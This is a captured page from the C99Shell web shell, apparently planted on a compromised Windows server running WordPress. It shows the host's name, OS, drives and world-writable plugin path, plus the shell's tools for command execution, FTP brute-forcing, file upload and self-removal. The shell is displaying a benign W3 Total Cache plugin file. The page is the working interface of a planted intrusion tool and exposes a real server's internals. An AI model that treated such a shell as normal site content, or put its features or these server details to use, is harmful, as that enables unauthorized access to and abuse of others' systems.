!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\w3-total-cache\lib\W3\   drwxrwxrwx
Free 4.11 GB of 39.52 GB (10.39%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     AdminLinks.php (1.38 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * Class W3_Environment
 */
class W3_AdminLinks {
    
/**
     * Update plugin link
     *
     * @return void
     */
    
function link_update($config) {
        
$this->link_delete();
        
$this->link_insert($config);
    }

    
/**
     * Insert plugin link into Blogroll
     *
     * @return void
     */
    
function link_insert($config) {
        
$support $config->get_string('common.support');
        
$matches null;
        if (
$support != '' && preg_match('~^link_category_(\d+)$~'$support$matches)) {
            require_once 
ABSPATH 'wp-admin/includes/bookmark.php';

            
wp_insert_link(array(
                
'link_url' => W3TC_LINK_URL,
                
'link_name' => W3TC_LINK_NAME,
                
'link_category' => array(
                    (int) 
$matches[1]
                ),
                
'link_rel' => 'nofollow'
            
));
        }
    }

    
/**
     * Deletes plugin link from Blogroll
     *
     * @return void
     */
    
function link_delete() {
        
$bookmarks get_bookmarks();
        
$link_id 0;
        foreach (
$bookmarks as $bookmark) {
            if (
$bookmark->link_url == W3TC_LINK_URL) {
                
$link_id $bookmark->link_id;
                break;
            }
        }
        if (
$link_id) {
            require_once 
ABSPATH 'wp-admin/includes/bookmark.php';
            
wp_delete_link($link_id);
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--